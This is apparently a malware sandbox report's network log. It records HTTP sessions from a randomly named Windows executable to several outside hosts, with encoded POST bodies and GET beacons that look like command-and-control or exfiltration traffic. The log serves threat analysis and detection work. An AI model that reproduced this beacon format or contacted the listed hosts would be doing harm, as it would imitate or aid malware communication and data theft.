                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 65 65 31 6a 32 55 37 74 42 71 73 50 72 51 52 4c 56 51 64 63 32 46 50 32 52 58 75 4f 31 75 31 34 62 4a 30 57 58 30 59 4b 61 58 41 4a 2b 54 49 6e 51 75 4c 46 6c 53 37 2f 44 2f 32 4d 72 7a 66 30 51 62 7a 76 42 59 6d 65 32 41 54 42 59 6e 42 65 7a 49 58 38 6d 66 57 2b 36 42 54 73 46 64 6c 41 38 53 74 4d 66 39 54 56 61 72 54 51 64 6a 47 6e 72 44 79 51 57 35 45 50 59 74 54 41 65 46 46 37 63 67 65 4e 34 49 59 61 35 66 30 58 45 6e 4e 33 45 35 30 41 46 4a 35 2b 33 73 72 4b 63 75 79 64 53 38 71 33 4e 6b 67 37 75 50 69 56 42 68 75 66 68 4f 75 4e 4d 4c 68 44 46 34 6e 35 4d 77 45 72 66 39 74 45 59 46 6e 4e 42 35 46 75 46 72 71 67 79 78 42 35 54 69 32 75 66 58 4d 65
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=ee1j2U7tBqsPrQRLVQdc2FP2RXuO1u14bJ0WX0YKaXAJ+TInQuLFlS7/D/2Mrzf0QbzvBYme2ATBYnBezIX8mfW+6BTsFdlA8StMf9TVarTQdjGnrDyQW5EPYtTAeFF7cgeN4IYa5f0XEnN3E50AFJ5+3srKcuydS8q3Nkg7uPiVBhufhOuNMLhDF4n5MwErf9tEYFnNB5FuFrqgyxB5Ti2ufXMe
Timestamp: Oct 11, 2024 15:10:00.054867029 CEST | Bytes transferred: 858 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                    date: Fri, 11 Oct 2024 13:09:59 GMT
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    Data Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49992 | Destination IP: 74.48.31.123 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp: Oct 11, 2024 15:10:01.984869003 CEST | Bytes transferred: 1853 | Direction: OUT | Data:
POST /fxh3/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.facaicloud.top
                                                                                                                                                                                                                                    Origin: http://www.facaicloud.top
                                                                                                                                                                                                                                    Referer: http://www.facaicloud.top/fxh3/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 65 65 31 6a 32 55 37 74 42 71 73 50 72 51 52 4c 56 51 64 63 32 46 50 32 52 58 75 4f 31 75 31 34 62 4a 30 57 58 30 59 4b 61 58 49 4a 2f 68 51 6e 51 50 4c 46 6a 69 37 2f 4b 66 32 4e 72 7a 66 31 51 62 72 72 42 59 37 6a 32 43 62 42 5a 43 64 65 36 61 76 38 74 66 57 2b 79 68 54 70 59 74 6c 76 38 54 42 49 66 35 33 56 61 72 54 51 64 68 75 6e 37 6d 53 51 46 70 45 51 49 4e 54 45 4a 56 45 6b 63 67 58 77 34 49 63 67 35 4a 45 58 64 48 64 33 4a 71 63 41 64 5a 35 38 77 73 71 66 63 75 4f 30 53 2f 4f 52 4e 6b 56 57 75 49 57 56 42 6c 58 56 34 66 57 4f 54 4a 74 79 58 70 65 5a 53 48 34 4d 65 50 64 49 59 48 62 56 4c 62 64 2b 48 73 71 43 78 52 59 2b 4e 55 69 38 5a 58 5a 6b 30 61 55 62 58 53 7a 74 66 75 48 57 48 2f 55 4c 2b 48 68 4c 6a 71 2b 33 78 5a 77 62 52 76 68 36 7a 42 33 64 4e 73 66 34 31 45 36 53 6f 4e 56 32 2b 6f 31 39 6f 45 43 77 69 65 45 6d 48 4f 59 2f 44 4e 74 58 46 36 66 64 5a 42 69 69 30 6a 36 72 71 69 70 54 79 6a 4b 4a 45 41 37 4b 42 6c 37 55 69 6a 43 54 77 58 4b 58 2f 72 34 59 6d [TRUNCATED]
Data Ascii: BHNhDJjp= [TRUNCATED]
Timestamp: Oct 11, 2024 15:10:02.659430027 CEST | Bytes transferred: 858 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                    date: Fri, 11 Oct 2024 13:10:02 GMT
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    Data Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49993 | Destination IP: 74.48.31.123 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp: Oct 11, 2024 15:10:04.522831917 CEST | Bytes transferred: 556 | Direction: OUT | Data:
GET /fxh3/?BHNhDJjp=TcdD1jH1CapNlBILQUUL6VPJeSSLh+pbMYQjXnoycmFxozx0bMDFjxvRFdG/tU/CFYGPAPKB1FL/Z2VQy4rjs+2Q8knST/5l8EVmCJfQbrXwTzWaySbdQJ1HTeqiGlwgAw==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.facaicloud.top
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Timestamp: Oct 11, 2024 15:10:05.166424036 CEST | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                    date: Fri, 11 Oct 2024 13:10:05 GMT
                                                                                                                                                                                                                                    Data Raw: 36 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4e 75 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 610<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> ... Fonts --> <link rel="dns-prefetch" href="//fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css?family=Nunito" rel="stylesheet"> ... Styles --> <style> html, body { background-color: #fff; color: #636b6f; font-family: 'Nunito', sans-serif; font-weight: 100; height: 100vh; margin: 0; } .full-height { height: 100vh; } .flex-center { align-items: center; display: flex; justify-content: center; } .position-ref { position: relative; } .code { border-right: 2 [TRUNCATED]
Timestamp: Oct 11, 2024 15:10:05.167201996 CEST | Bytes transferred: 550 | Direction: IN | Data:
Data Raw: 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 35 70 78 20 30 20 31 35 70 78 3b 0a 20
                                                                                                                                                                                                                                    Data Ascii: solid; font-size: 26px; padding: 0 15px 0 15px; text-align: center; } .message { font-size: 18px; text-align: center; }


Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49994 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe

Timestamp: Oct 11, 2024 15:10:10.219881058 CEST | Bytes transferred: 807 | Direction: OUT | Data:
POST /qy56/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.nibcorp.xyz
Origin: http://www.nibcorp.xyz
Referer: http://www.nibcorp.xyz/qy56/
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=jwtWjQl2tz1MhLIpnJqNlsg7mg/zLCTirW7gkxyyhikw021eprGe/Atx8n8OJr4rL87xj4Ahw7bWBVvtLGfv+rojgarFca4Id72YVZwduXEPJenZkqCQqGxFv/9AyCRSPsLFbIr2BM5Fi+/cqKtvNQsdpipjyFBdZSxceVLhKVS70ZnFJTt5UJ6sniqPlE2QfzQal3U=


Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49995 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp: Oct 11, 2024 15:10:12.760232925 CEST | Bytes transferred: 827 | Direction: OUT | Data:
POST /qy56/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.nibcorp.xyz
Origin: http://www.nibcorp.xyz
Referer: http://www.nibcorp.xyz/qy56/
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=jwtWjQl2tz1Mjv0pgu2NgMgkpA/zFiTmrW3gk0SimU8w0Xpe7qGe4Atx0H8XHL4kL82Mj94hw7fWBQTtI13ssroho6rDDK4Id72YVdY7uXcPJvXZlLCf02xEmf9AgyRWPsL3bKPQBPNFi/PcpbtsHQt32yo27W0SABRARz6abziC8PKvTxlRHpWU3xi400X5FQAq7gCLjMwp275jbjF7MOfDQh3s


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49996 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp: Oct 11, 2024 15:10:15.309875965 CEST | Bytes transferred: 1844 | Direction: OUT | Data:
POST /qy56/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.nibcorp.xyz
Origin: http://www.nibcorp.xyz
Referer: http://www.nibcorp.xyz/qy56/
Content-Length: 1245
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp= [TRUNCATED]


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49997 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp: Oct 11, 2024 15:10:17.852786064 CEST | Bytes transferred: 553 | Direction: OUT | Data:
GET /qy56/?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxa HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.nibcorp.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Timestamp: Oct 11, 2024 15:10:18.377603054 CEST | Bytes transferred: 412 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: openresty
Date: Fri, 11 Oct 2024 13:10:18 GMT
Content-Type: text/html
Content-Length: 272
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxa"}</script></head></html>


Session ID: 13 | Source IP: 192.168.2.5 | Source Port: 49998 | Destination IP: 206.119.82.147 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp: Oct 11, 2024 15:10:23.798057079 CEST | Bytes transferred: 801 | Direction: OUT | Data:
POST /u0td/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.93wxd.top
Origin: http://www.93wxd.top
Referer: http://www.93wxd.top/u0td/
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=JrLyW5Qm1blY+dcdvXRcP0xYmLeN90UPIDqEvoDFk35nQXLiGeNvwNGs/TJR+X9rB01KnA1tC5kbFcgVEsN4cMrQc+4PwDYSSgc22kc8RoKYjB4EB/KX9NHg72wHlqNUxeBP3FjmruGdwFuKVKHA2s7XjiyIg/nfadJje5Vsoz5Haw3xRov0+lQf/GRaX4/RPrerMcU=
Timestamp: Oct 11, 2024 15:10:24.685511112 CEST | Bytes transferred: 691 | Direction: IN | Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Oct 2024 13:10:24 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49999 | Destination IP: 206.119.82.147 | Destination Port: 80 | PID: 3224 | Process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp: Oct 11, 2024 15:10:26.337240934 CEST | Bytes transferred: 821 | Direction: OUT | Data:
POST /u0td/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.93wxd.top
Origin: http://www.93wxd.top
Referer: http://www.93wxd.top/u0td/
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=JrLyW5Qm1blY49sdt2RcOUxbpreN0UULIDmEvtielCpnQzPiHb5vlNGs1zJUw38GB0pznBJtC5gbFdQVFbZnccrSFO4N+jYSSgc22kIaRoiYkxIEAamUi9Hj82wHuKNQxeAg3EuNroCdwEeKUY/D9s7R8SzilfaLQNhia7MP5gw5WmabLKnctF8nvVZtGIe4VIObSLAnyedUpmF+girMy6YrhaOS
Oct 11, 2024 15:10:27.258616924 CEST | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Oct 2024 13:10:27 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 50000 | 206.119.82.147 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:28.943103075 CEST | 1838 | OUT | POST /u0td/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.93wxd.top
Origin: http://www.93wxd.top
Referer: http://www.93wxd.top/u0td/
Content-Length: 1245
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
Data Ascii: BHNhDJjp=JrLyW5Qm1blY49sdt2RcOUxbpreN0UULIDmEvtielChnQAHiF8Vvj9Gs2zJVw38+B0w7nBFbC88bF/0VV+1nTcrSY+4MwDYiSkw62kYaRoiYk3EEJvKUg9Hg72wxlqN8xeJX3Er2r4idwkOKWtTD0s7T/Sz6lfW9QLFUa6ol5gI5TgqBYpfj7mUb8zxLXPqudKydTrJd9tFhuGpYiwqQr7k4o/fmAI7gkfjSQUa8fnEvOIPzCj/u9zZeXNp069ebrH6ZIa+XO/7saYRpqpSHnTcZ5qnPK5CLrVrmR0ZBc/Y9UiuKrU2SabMsblLs+psAHmFG3re3rJdvpvDAh0zXJWUH2w32C9i9EVxmur7aBpI8qXiUULfq9pKu56LHlGaiM0MrUrlMVcr7IoY34nLrTWv7UIZfaK55EZ8Ovl5RlWNLRwdWfdYQEn4Mc4N+qFn8b0d8qmT1T3pB7LV0mwWs5JWOkAEfcZ1xDWrd1FN6vZRw7Fr/0Gq0Ny3gCUEyWWp4pKya++1WZMQDOXow2qYeU1x4CKFflLzdUjLNDjARwG9rmIjb9BKrrLHYqqqQYEpxcxo7pMxez3vhOVS8JJkzweRfSWO99b9MXYt+QXubE/H/ueeo9U2Qq8TessWI1qbb0S6ikXQ8Gq26PJQOWwwFGdHeQcDtRnVH4LGwwipRyrHoISlsTjoA2tpYilBh2Fg5NcAVkiUBPXMS6fPVAJVCVlxtuIrUJSktmNRE6Ps0+h5HKu3UfU9HwhKu4Ps9TmbMPPf5i/cK9/xcMZb9u9O4zdzH19owodFh68D0vYRcY1g/g2rVdZkxUhopQFoiBYxCD+lDJeFnZdhp1150AJDciwQTaKA4Z8y5HUYlKPg2awzh4LXkIc7+pLPYqMEk0GJNFebm+Qaf9OyHTsdQ3aiqzLxBZlmPgY0zMjIUyU+uxY/f5UUPSp9HqGx2K25oL0U21SUIAPc8fmERN+CJ9T/qzoghVRgAwuoYEikENGAhBem [TRUNCATED]
Oct 11, 2024 15:10:29.825510025 CEST | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Oct 2024 13:10:29 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 50001 | 206.119.82.147 | 80 | 3224 | C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 15:10:31.477698088 CEST | 551 | OUT | GET /u0td/?BHNhDJjp=EpjSVPpO4pF17PlQ3DNgKhd2v7ja1FkLRxKjmJiLsn9eFCahEsp5jtnh1y932jU+ck47tHBUUsolNvMtAutbQ5HDaIUs2x8kIyYJtigiYamWvQ0ME/HlpqSu5UMEi5UFjQ==&KteDo=fX0Hm8kxa HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
